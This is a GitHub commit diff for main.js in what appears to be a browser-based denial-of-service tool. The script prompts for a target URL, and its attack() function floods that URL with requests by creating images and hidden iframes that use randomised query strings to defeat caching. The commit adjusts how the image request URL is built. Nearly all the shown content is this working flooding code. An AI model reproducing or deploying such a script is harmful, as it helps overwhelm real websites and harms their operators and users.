Skip to content

Commit e5f2525

Browse files
authored
Update main.js
1 parent 7d6c4ff commit e5f2525

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

main.js

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -2,7 +2,7 @@ var target = prompt("Url");
22
function attack() {
33
var pic = new Image();
44
var rand = Math.floor(Math.random() * 1000);
5-
pic.src = 'http://'+target+rand;
5+
pic.src = 'http://'+target+"/?"+rand;
66

77
document.body.innerHTML+='<iframe src="'+target+"/?"+rand+'" style="display:none;"></iframe>';
88
}

0 commit comments

Comments
 (0)